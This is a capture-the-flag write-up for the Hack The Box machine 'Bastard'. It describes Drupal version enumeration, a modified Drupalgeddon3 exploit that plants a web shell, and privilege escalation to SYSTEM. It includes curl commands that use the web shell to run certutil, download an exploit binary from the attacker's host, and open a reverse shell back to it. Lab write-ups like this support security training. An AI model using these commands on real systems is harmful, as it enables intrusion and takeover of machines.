HTB | Bastard

This is a Windows box. You can find it here.

Skill Learned

• Enumerating CMS versions (Drupal)

• Exploit modification

NMAP

IP: 10.10.10.9

nmap scan

Port 80

We found a Drupal website

port 80

In robots.txt we found CHANGELOG.txt

/robots.txt

/changelog.txt

We found Drupal 7.54

Foothold/shell and Priv Esc

Found Drupalgeddon3 on searchsploit

searchsploit

Msf exploit was not working

Let's try this. Change the URL, endpoint_path, filename, data

and run

running php

It gave us two files user.json and session.json

user.json

Let's try and crack administrator hash

hashcat -m 7900 admin.hash /home/anurag/Downloads/rockyou.txt --force

It is taking too much time, We have an alternate way. Remember we have test.php on the server. We can curl

curl http://10.10.10.9/test.php?cmd=whoami

curl http://10.10.10.9/test.php?cmd=whoami

Let's use windows-exploit-suggester

copy systeminfo

systeminfo

update the database and run

windows-exploit-suggester

Let's use this

We will copy the exe on the box

curl http://10.10.10.9/test.php?cmd="certutil%20-urlcache%20-f%20http://10.10.14.14:80/MS10-059.exe%20MS10-059.exe"

putting exploit

Let's run it

curl http://10.10.10.9/test.php?cmd="MS10-059.exe%2010.10.14.14%201234"

running exploit

geting shell

and we are nt\authority

Found user.txt

user.txt

found root.txt

root.txt